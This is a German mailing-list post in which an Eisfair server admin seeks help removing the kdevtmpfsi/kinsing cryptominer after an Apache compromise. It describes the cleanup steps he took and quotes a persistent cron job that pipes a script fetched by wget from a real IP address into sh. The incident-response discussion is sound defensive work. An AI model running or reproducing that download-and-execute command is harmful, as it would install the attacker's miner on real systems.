[Eisfair] Hilfe bei Entfernung von Malware benötigt. (kdevtmpfsi)

Detlef Paschke schabau at t-online.de
Fr Okt 8 14:11:32 CEST 2021 

Am 08.10.2021 um 13:25 schrieb Holger Bruenjes:
> Hallo Detlef

Hallo Holger,

> 
> Am 08/10/2021 um 12.07 schrieb Detlef Paschke:
>> Am 08.10.2021 um 11:36 schrieb Detlef Paschke:
> 
>>> irgend wie wurde mein Eisfair von kdevtmpfsi befallen und ich bekomme
>>> Ihn noch nicht richtig Sauber.
>>
>> Den Angriff konnte ich in den Apache Logs finden. Heute Nacht um 0:29
>> müssen die Angriffe losgegangen sein und wie ich es in /var/log/messages
>> verstehe, war der Angreifer kurz nach Eins im System.

> 
> Hat es dich auch erwischt

ja leider, ich bin aber in den Zeilen vom Log verrutscht, der gute Mann
aus Russland war wohl sogar sofort auf dem Server und hat nicht 30
Minuten gebraucht.

Die Einträge im error-log gehen von

[Fri Oct 08 01:00:01.454248 2021]

bis...

[Fri Oct 08 01:00:08.849720 2021]

und dann war es das.

> installiere das update von Pack-Eis -> apache2-2.3.2

Habe ich gerade erledigt.

> es gibt in der Liste 2 Prozesse
> 
> kdevtmpfsi
> kinsing

Die habe ich gleich Früh gekillt, die binary in /tmp gefunden, gelöscht
und per touch neu erstellt, mit einem Text gefüllt und die Rechte 444
gegeben.

> alle Vorkommnisse stoppen am besten mit htop, dann sind auch die 
> parent sichtbar.
> 
> dann wohl in tmp
> 
> die beiden auch entfernen und
> 
> libsystem.so

Die finde ich auf dem System nicht

> ich weiss jetzt nicht was bei dir im log steht, hate er Erfolg mit 
> seinen Kommandos gehabt oder lief das auf noch found raus

Die Logs habe ich gesichert.
Erfolg hatte er auf jeden Fall. Ich werfe Früh beim Kaffee Trinken immer
einen Blick auf phpSysinfo und so sind mir sofort die 100% CPU-Last
aufgefallen.

> dann noch coreutils von pack-eis zur SIcherheitrueberbuegeln

Auch das habe ich gemacht.

Und trotzdem wird immer wieder ein Cronjob für wwwrun unter
/var/spool/fcron/ erstellt und ich finde nicht, von wo der erstellt wird.

Die Prozesse kdevtmpfsi und kinsing laufen schon seit meinen ersten
Eingriffen heute Morgen nicht mehr.
Aber der Job tickert hier jede Minute und ich bekomme ihn nicht weg.

Job 'wget -q -O - http://185.191.32.198/unk.sh | sh > /dev/null 2>&1'
started for user wwwrun (pid 20915)

> Holger

Viele Grüße
Detlef Paschke

-- 
Das "Zitat des Augenblicks" gibt es nur auf
http://schabau.eu
Meine "Merkzettel"
http://helpdesk.schabau.eu

Mehr Informationen über die Mailingliste Eisfair